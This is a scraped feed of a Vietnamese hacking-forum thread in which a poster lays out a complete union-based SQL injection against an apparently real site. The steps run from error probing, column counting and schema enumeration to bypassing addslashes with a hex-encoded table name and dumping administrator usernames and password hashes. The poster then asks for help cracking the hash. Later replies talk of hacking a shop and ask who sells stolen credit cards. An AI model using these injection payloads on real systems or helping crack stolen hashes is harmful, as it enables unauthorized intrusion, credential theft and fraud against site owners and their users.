<![CDATA[Latest posts for the topic "Gặp lỗi khi tấn công SQL Injection"]]> /hvaonline/posts/list/12.html JForum - http://www.jforum.net Gặp lỗi khi tấn công SQL Injection Code:
http://www.abc.co.uk/node.php?id=1
chạy ok không lỗi tiếp theo chạy Code:
http://www.abc.co.uk/node.php?id=1'
ok đã thấy lỗi SQL Injection Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Tiếp theo tìm số cột bằng cách chạy Code:
http://www.abc.co.uk/node.php?id=1 order by 1--
rồi dần dần tăng lên 1 đơn vị thì thấy đến 5 là báo lỗi suy ra có 4 cột từ 1-4, ok bước này xong Tiếp theo chạy Code:
http://www.abc.co.uk/node.php?id=nul union select 1,2,3,4--
để tìm số cột bị lỗi và ở đây nó báo là 4 Tiếp theo chạy Code:
http://www.abc.co.uk/node.php?id=null union select 1,2,3,version()--
để lấy version database thì thấy hiện Code:
5.1.73-log
Tiếp theo chay Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(schema_name) from information_schema.schemata--
để lấy tên database thì thấy báo Code:
information_schema,db312892314
ok bước này xong Tiếp theo chạy Code:
http://www.abc.co.uk/node.php?id=5 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--
để lấy danh sách bảng trong database thì thấy hiện 1 đống các bảng sau Code:
administrators,album,events,gallery,links,news,p_album,p_categories,p_events,p_gallery,p_links,p_news,p_products,p_salsa,p_suscriptors,p_users,p_videos,salsa,suscriptors,users,videos
Tiếp theo chạy Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e6973747261746f7273--
đề lấy các cột trong bảng administrators, ở đây phải thực hiện phương pháp bypass filter addslashes() chứ gõ administrator là không được. thấy hiện lên các cột Code:
id, user_name,user_password
ok bước này xong Tiếp theo là bước quan trọng gần xong là lấy user_name và pass trong các cột của bảng administrators Mình chạy truy vấn sau Code:
http://www.abc.co.uk/node.php?id=5 uNion seleCt 1,2,3,group_concat(id,0x2f,user_name,0x2f,user_password) from administrators -- -
thì đã lấy được user và pass nhưng pass dạng sau Code:
$P$Bstga7byV42vvh7WVT/pPFPZw6j7ET.
thì dầu đoạn mã trên có ký tự $P$B thì biết đó là kiểu Decrypt MD5 $Wordpress gì đấy, vào mấy trang decrypt online mà không ăn thua, ai có cao kiến gì không ? Xin anh em xem giúp với ]]>
/hvaonline/posts/list/45538.html#280119 /hvaonline/posts/list/45538.html#280119 GMT
Gặp lỗi khi tấn công SQL Injection /hvaonline/posts/list/45538.html#280129 /hvaonline/posts/list/45538.html#280129 GMT Gặp lỗi khi tấn công SQL Injection /hvaonline/posts/list/45538.html#280202 /hvaonline/posts/list/45538.html#280202 GMT Gặp lỗi khi tấn công SQL Injection

hackeraku wrote:
chịu ròi bờ lồ bỏ thời gian đi giải mã thôi mình hack 1 shop mới có vẻ ngon hơn :^)  
Có AE nào sell cc ko? mình đang gần mua.]]>
/hvaonline/posts/list/45538.html#280231 /hvaonline/posts/list/45538.html#280231 GMT
Gặp lỗi khi tấn công SQL Injection /hvaonline/posts/list/45538.html#280280 /hvaonline/posts/list/45538.html#280280 GMT Gặp lỗi khi tấn công SQL Injection /hvaonline/posts/list/45538.html#280481 /hvaonline/posts/list/45538.html#280481 GMT Gặp lỗi khi tấn công SQL Injection /hvaonline/posts/list/45538.html#280634 /hvaonline/posts/list/45538.html#280634 GMT Gặp lỗi khi tấn công SQL Injection /hvaonline/posts/list/45538.html#280702 /hvaonline/posts/list/45538.html#280702 GMT